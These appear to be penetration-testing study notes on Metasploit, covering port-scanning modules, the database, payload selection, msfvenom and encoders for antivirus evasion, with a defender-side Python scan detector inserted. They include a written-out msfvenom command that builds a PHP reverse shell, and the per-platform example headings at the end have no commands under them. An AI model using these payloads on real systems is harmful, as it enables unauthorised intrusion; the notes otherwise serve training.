Exploitation
Exploitation using Metasploit.
Scanning
Metasploit has many modules for port scanning; these can be listed by running search portscan from msfconsole. Port scanning modules usually require some options to be set, such as:
CONCURRENCY: number of ports to be scanned simultaneously
PORTS: port range to be scanned. This differs from nmap: nmap scans the 1000 most commonly used ports by default, whereas Metasploit scans ports 1 to 10,000.
RHOSTS: target to scan
THREADS: number of threads to be used simultaneously
The /scanner/discovery/udp_sweep module allows quick identification of UDP services and can help quickly identify DNS or NetBIOS.
The smb_enumshares and smb_version modules can be useful in corporate networks.
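As an added, defender-side illustration (not part of the original notes), the following Python function flags the traffic pattern the port scan modules above produce: one source touching many distinct ports on one host within a short window, which is what a sweep of a wide PORTS range with high CONCURRENCY/THREADS looks like on the wire. The log line format, the sample entries and the thresholds are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format (not from the notes): "<ISO timestamp> SRC=<ip> DST=<ip> DPT=<port>"
LINE_RE = re.compile(r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<dpt>\d+)$")

def parse_line(line):
    """Return (timestamp, src, dst, dst_port), or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dpt"])

def detect_port_scans(lines, window_seconds=10, min_ports=20):
    """Map (src, dst) -> most distinct destination ports src touched on dst within any
    window_seconds window, for pairs that reach min_ports. A sweep of a wide PORTS range
    with high CONCURRENCY/THREADS shows up as many distinct ports in a very short time."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, dpt = parsed
            events[(src, dst)].append((ts, dpt))
    alerts = {}
    window = timedelta(seconds=window_seconds)
    for pair, evs in events.items():
        evs.sort()
        start = 0
        in_window = defaultdict(int)  # port -> hits inside the current window
        for ts, dpt in evs:
            in_window[dpt] += 1
            while evs[start][0] < ts - window:  # drop events older than the window
                old_port = evs[start][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                start += 1
            if len(in_window) >= min_ports:
                alerts[pair] = max(alerts.get(pair, 0), len(in_window))
    return alerts
# Constructed sample: 10.0.0.5 sweeps ports 1-60 on 10.0.0.20 within two seconds; 10.0.0.7 only makes a few ordinary web connections.
SCAN_LINES = [f"2024-05-01T10:00:{i % 2:02d} SRC=10.0.0.5 DST=10.0.0.20 DPT={i}" for i in range(1, 61)]
BENIGN_LINES = [
    "2024-05-01T10:00:00 SRC=10.0.0.7 DST=10.0.0.20 DPT=443",
    "2024-05-01T10:00:05 SRC=10.0.0.7 DST=10.0.0.20 DPT=443",
    "2024-05-01T10:00:09 SRC=10.0.0.7 DST=10.0.0.20 DPT=80",
]
SAMPLE_LOG = SCAN_LINES + BENIGN_LINES  # detect_port_scans(SAMPLE_LOG) -> {('10.0.0.5', '10.0.0.20'): 60}
```

Tune window_seconds and min_ports to the network: a slow scan with low THREADS spreads its ports over a longer period, so a wider window is needed to catch it.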
Metasploit Database
The Metasploit database can be used to simplify attacking several targets. To initialise it, run systemctl start postgresql followed by msfdb init. To verify that it is running, enter msfconsole and then run db_status.
On launch you will be in the default workspace, which can be verified by typing workspace. A workspace can be added using workspace -a [workspace_name] or removed using workspace -d [workspace_name]. You can jump between workspaces using workspace [workspace_name].
In a database-backed Metasploit session, you can use help to list the Database Backend Commands. Running db_nmap will save all results to the database. Information on relevant target hosts and services can then be viewed using hosts or services respectively. Using hosts -R will set the host(s) values to RHOSTS by default.
Vulnerability Scanning
Metasploit allows quick identification of critical vulnerabilities that can be considered "low-hanging fruit": typically any easily exploitable, vulnerable service that would allow a foothold on a server or even high-level privileged access. The better you are at scanning and fingerprinting a service, the easier it will be to identify critical vulnerabilities.
Exploiting
Once you have selected an exploit, you can either use the default payload or select a payload using show payloads and then set payload [payload_name | line_number].
Msfvenom
Msfvenom allows you to generate your own payloads. It provides access to all available payloads in Metasploit and allows you to create them in many different formats, for many different systems. Msfvenom can generate a stand-alone payload or a usable raw-format payload; you can list the supported outputs using msfvenom --list formats.
Encoders can be applied to try to evade antivirus, but in most cases modern obfuscation or injection methods are far more effective. Encoding is enabled with the -e option.
Example command to generate a generic PHP reverse shell: msfvenom -p php/reverse_php LHOST=[IP_ADDR] LPORT=[PORT] -f raw > reverse_shell.php. The output will be missing the opening PHP tag and the closing tag; these should be added to turn it into a working PHP file.
Commonly used examples follow. In these examples LHOST is the IP address of your attacking machine and LPORT is the port the handler listens on:
For Linux:
Note for this one: an .elf on Linux is the equivalent of an .exe on Windows. Once it is uploaded, make sure it has executable permissions by running chmod +x rev_shell.elf.
For Windows:
For PHP:
For ASP:
For Python: